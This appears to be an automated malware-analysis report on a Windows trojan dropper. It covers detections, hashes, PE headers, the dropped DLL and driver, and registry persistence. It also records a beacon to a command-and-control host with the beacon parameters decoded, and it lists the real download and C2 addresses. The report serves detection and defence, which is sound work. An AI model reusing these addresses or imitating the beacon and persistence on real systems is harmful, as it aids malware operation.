Download Link: hxxp://xo-host.net/ugc.exe
File Name: ugc.exe

VirusTotal Result: 10/32 (31.25%)

AntiVir             7.6.0.85       2008.04.15   TR/Drop.Agent.qkg
Avast               4.8.1169.0     2008.04.15   Win32:Agent-OXU
eSafe               7.0.15.0       2008.04.09   suspicious Trojan/Worm
Ewido               4.0            2008.04.15   Dropper.Agent.qkg
F-Secure            6.70.13260.0   2008.04.15   Trojan-Dropper.Win32.Agent.qkg
Ikarus              T3.1.1.26.0    2008.04.15   Virus.Win32.Agent.OXU
Kaspersky           7.0.0.125      2008.04.15   Trojan-Dropper.Win32.Agent.qkg
NOD32v2             3028           2008.04.15   Win32/Spy.Goldun.NCV
Sophos              4.28.0         2008.04.15   Mal/EncPk-CO
Webwasher-Gateway   6.6.2          2008.04.15   Trojan.Drop.Agent.qkg

File Info:
File size: 11776 bytes
MD5...: d6f34d8f5ccf780cb4113929652cceeb
SHA1..: 963f320466199764e18356aff04e76f4848b84ea
SHA256: 72cb4c26f082bbf2d4ddf8508ca4c1ab768ae5b532a20bb84d4263c9d31942d8
SHA512: e30ee9ee6ba13cf0b5a9eba56fa4429f2b2c4b7891784557fc9a4cc51425c2871ad6b0a1aad620684c686f0a56f11c79e2229bacfe760266926c10d6740ab10f

PE Structure:
Entry Point Address.: 0x40a750
Time Date Stamp.....: 0x468da383 (Fri Jul 06 02:05:55 2007)
Machine Type........: 0x14c (I386)

PE Header:
Signature: 00004550
Machine: 014C - Intel 386
Number of sections: 0003
Time/Date stamp: 468DA383
Pointer to symbol table: 00000000
Number of symbols: 00000000
Size of optional header: 00E0
Characteristics: 010F
Magic: 010B
Linker version (major): 05
Linker version (minor): 0C
Size of code: 00003000
Size of initialized data: 00001000
Size of uninitialized data: 00007000
Address of entry point: 0000A750
Base of code: 00008000
Base of data: 0000B000
Image base: 00400000
Section alignment: 00001000
File alignment: 00000200
OS version (major): 0004
OS version (minor): 0000
Image version (major): 0000
Image version (minor): 0000
Sub system version (major): 0004
Sub system version (minor): 0000
Win32 version: 00000000
Size of image: 0000C000
Size of headers: 00001000
Checksum: 00000000
Sub system: 0002 - Windows graphical user interface (GUI) subsystem
DLL characteristics: 0000
Size of stack reserve: 00040000
Size of stack commit: 00001000
Size of heap reserve: 00100000
Size of heap commit: 00001000
Loader flags: 00000000
Number of RVA: 00000010

PE Sections:
Section   VirtSize   VirtAddr   PhysSize   PhysAddr   Flags
UPX0      00007000   00001000   00000000   00000200   E0000080
UPX1      00003000   00008000   00002A00   00000200   E0000040
UPX2      00001000   0000B000   00000200   00002C00   C0000040

Import table (libraries: 1):
KERNEL32.DLL (imports: 6): LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess

When Executed drops the files:
C:\WINDOWS\system32\ibudu.dll
C:\WINDOWS\system32\itcoe.sys

File Name: ibudu.dll
File Size: 6672 Bytes
MD5: 39DF57F7D411871FFB7538DB4DB6F562

PE Header:
Signature: 00004550
Machine: 014C - Intel 386
Number of sections: 0003
Time/Date stamp: 4800A698
Pointer to symbol table: 00000000
Number of symbols: 00000000
Size of optional header: 00E0
Characteristics: 210E
Magic: 010B
Linker version (major): 05
Linker version (minor): 0C
Size of code: 00002000
Size of initialized data: 00001000
Size of uninitialized data: 0000D000
Address of entry point: 0000F3B0
Base of code: 0000E000
Base of data: 00010000
Image base: 10000000
Section alignment: 00001000
File alignment: 00000200
OS version (major): 0004
OS version (minor): 0000
Image version (major): 0000
Image version (minor): 0000
Sub system version (major): 0004
Sub system version (minor): 0000
Win32 version: 00000000
Size of image: 00011000
Size of headers: 00001000
Checksum: 00000000
Sub system: 0002 - Windows graphical user interface (GUI) subsystem
DLL characteristics: 0000
Size of stack reserve: 00100000
Size of stack commit: 00001000
Size of heap reserve: 00100000
Size of heap commit: 00001000
Loader flags: 00000000
Number of RVA: 00000010

PE Sections:
Section   VirtSize   VirtAddr   PhysSize   PhysAddr   Flags
UPX0      0000D000   00001000   00000000   00000200   E0000080
UPX1      00002000   0000E000   00001600   00000200   E0000040
UPX2      00001000   00010000   00000200   00001800   C0000040

Export table (names: 1, functions: 1):
#0 - ibudu

Import table (libraries: 4):
KERNEL32.DLL (imports: 5): LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree
ADVAPI32.dll (imports: 1): RegCloseKey
USER32.dll (imports: 1): wsprintfA
WS2_32.dll (imports: 1): #23

File Name: itcoe.sys
File Size: 2560 bytes
MD5: 323C6379B5AF5B9D763582AE0F3DCA98

PE Header:
Signature: 00004550
Machine: 014C - Intel 386
Number of sections: 0003
Time/Date stamp: 4800A698
Pointer to symbol table: 00000000
Number of symbols: 00000000
Size of optional header: 00E0
Characteristics: 210E
Magic: 010B
Linker version (major): 05
Linker version (minor): 0C
Size of code: 00002000
Size of initialized data: 00001000
Size of uninitialized data: 0000D000
Address of entry point: 0000F3B0
Base of code: 0000E000
Base of data: 00010000
Image base: 10000000
Section alignment: 00001000
File alignment: 00000200
OS version (major): 0004
OS version (minor): 0000
Image version (major): 0000
Image version (minor): 0000
Sub system version (major): 0004
Sub system version (minor): 0000
Win32 version: 00000000
Size of image: 00011000
Size of headers: 00001000
Checksum: 00000000
Sub system: 0002 - Windows graphical user interface (GUI) subsystem
DLL characteristics: 0000
Size of stack reserve: 00100000
Size of stack commit: 00001000
Size of heap reserve: 00100000
Size of heap commit: 00001000
Loader flags: 00000000
Number of RVA: 00000010

PE Sections:
Section   VirtSize   VirtAddr   PhysSize   PhysAddr   Flags
UPX0      0000D000   00001000   00000000   00000200   E0000080
UPX1      00002000   0000E000   00001600   00000200   E0000040
UPX2      00001000   00010000   00000200   00001800   C0000040

Export table (names: 1, functions: 1):
#0 - ibudu

Import table (libraries: 4):
KERNEL32.DLL (imports: 5): LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree
ADVAPI32.dll (imports: 1): RegCloseKey
USER32.dll (imports: 1)

Process Details:
Filename: ugc.exe
MD5: d6f34d8f5ccf780cb4113929652cceeb
SHA-1: 963f320466199764e18356aff04e76f4848b84ea
File Size: 11776 Bytes

Registry Values Added:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ibudu
HKLM\SYSTEM\CurrentControlSet\Services\VFILT
HKLM\SYSTEM\CurrentControlSet\Services\ccEvtMgr
HKLM\SYSTEM\CurrentControlSet\Services\ccPwdSvc
HKLM\SYSTEM\CurrentControlSet\Services\ccPxySvc
HKLM\SYSTEM\CurrentControlSet\Services\NISUM
HKLM\SYSTEM\CurrentControlSet\Services\SymEvent
HKLM\SYSTEM\CurrentControlSet\Services\SYMTDI
HKLM\System\CurrentControlSet\Services\itcoe
HKLM\System\CurrentControlSet\Services\itcoe\Security

Registry Values Read:
Key | Name | Value | Times
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ibudu | psmod | 6BBD8036ACF502DA366B | 2
HKLM\SYSTEM\CONTROLSET001\SERVICES\TCPIP\LINKAGE | Bind | 0x5c004400650076006900630065005c007b00420032004200350031003000 | 442
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874} | DhcpServer | 255.255.255.255 | 442
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{B2B51064-BBF5-4528-B62B-E6D62A782874} | EnableDHCP | 0 | 221
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters | WinSock_Registry_Version | 2.0 | 2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 | Num_Catalog_Entries | 3 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5 | Serial_Access_Num | 4 | 2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 | DisplayString | Tcpip | 4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 | Enabled | 1 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 | LibraryPath | %SystemRoot%\System32\mswsock.dll | 2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 | ProviderId | 0x409d05229e7ecf11ae5a00aa00a7112b | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 | StoresServiceClassInfo | 0 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 | SupportedNameSpace | 12 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000001 | Version | 0 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 | DisplayString | NTDS | 4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 | Enabled | 1 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 | LibraryPath | %SystemRoot%\System32\winrnr.dll | 2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 | ProviderId | 0xee37263b80e5cf11a55500c04fd8d4ac | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 | StoresServiceClassInfo | 0 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 | SupportedNameSpace | 32 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000002 | Version | 0 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 | DisplayString | Network Location Awareness (NLA) Namespace | 4
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 | Enabled | 1 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 | LibraryPath | %SystemRoot%\System32\mswsock.dll | 2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 | ProviderId | 0x3a244266a83ba64abaa52e0bd71fdd83 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 | StoresServiceClassInfo | 0 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 | SupportedNameSpace | 15 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries\000000000003 | Version | 0 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 | Next_Catalog_Entry_ID | 1012 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 | Num_Catalog_Entries | 11 | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9 | Serial_Access_Num | 4 | 2
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001 | PackedCatalogItem | %SystemRoot%\system32\mswsock. | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002 | PackedCatalogItem | %SystemRoot%\system32\mswsock. | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003 | PackedCatalogItem | %SystemRoot%\system32\mswsock. | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004 | PackedCatalogItem | %SystemRoot%\system32\rsvpsp.d | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005 | PackedCatalogItem | %SystemRoot%\system32\rsvpsp.d | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006 | PackedCatalogItem | %SystemRoot%\system32\mswsock. | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007 | PackedCatalogItem | %SystemRoot%\system32\mswsock. | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008 | PackedCatalogItem | %SystemRoot%\system32\mswsock. | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009 | PackedCatalogItem | %SystemRoot%\system32\mswsock. | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010 | PackedCatalogItem | %SystemRoot%\system32\mswsock. | 1
HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011 | PackedCatalogItem | %SystemRoot%\system32\mswsock. |
HKLM\SYSTEM\CONTROLSET001\SERVICES\itcoe\Enum | 0 | Root\LEGACY_ITCOE\0000 | 1
HKLM\SYSTEM\CONTROLSET001\SERVICES\itcoe\Enum | | |

Registry Values Changed:
Key | Name | New Value
HKLM\System\CurrentControlSet\Services\itcoe | DisplayName | itcoe adapter
HKLM\System\CurrentControlSet\Services\itcoe | ErrorControl | 0
HKLM\System\CurrentControlSet\Services\itcoe | ImagePath | \??\C:\WINDOWS\system32\itcoe.sys
HKLM\System\CurrentControlSet\Services\itcoe | Start | 1
HKLM\System\CurrentControlSet\Services\itcoe | Type | 1
HKLM\System\CurrentControlSet\Services\itcoe\Security | Security | 0x01001480900000009c000000140000003000000002001c00010000000280

Drivers Loaded:
HKLM\System\CurrentControlSet\Services\itcoe

Network Activity:
Port    Type   Status
53626   tcp    Listening
36071   tcp    Listening

HTTP Connection: From SandBox:1034 to 69.50.160.21:80 - [artmaza.mazafaka.biz]
Request: GET /gt8.php?tma=&mode=7665723D50533726736F636B73706F72743D35333632362669643D31393034382668747470706F72743D333630373126757074696D656D3D3326757074696D65683D30267569643D3642424438303336414346353032444133363642
(The mode parameter is plain hex-encoded ASCII and decodes to: ver=PS7&socksport=53626&id=19048&httpport=36071&uptimem=3&uptimeh=0&uid=6BBD8036ACF502DA366B. The two port numbers match the listening TCP ports above and the uid matches the psmod value stored under the Winlogon\Notify\ibudu key, which is what ties the beacon, the listeners and the registry artifact to one sample.)
Response: 200 "OK"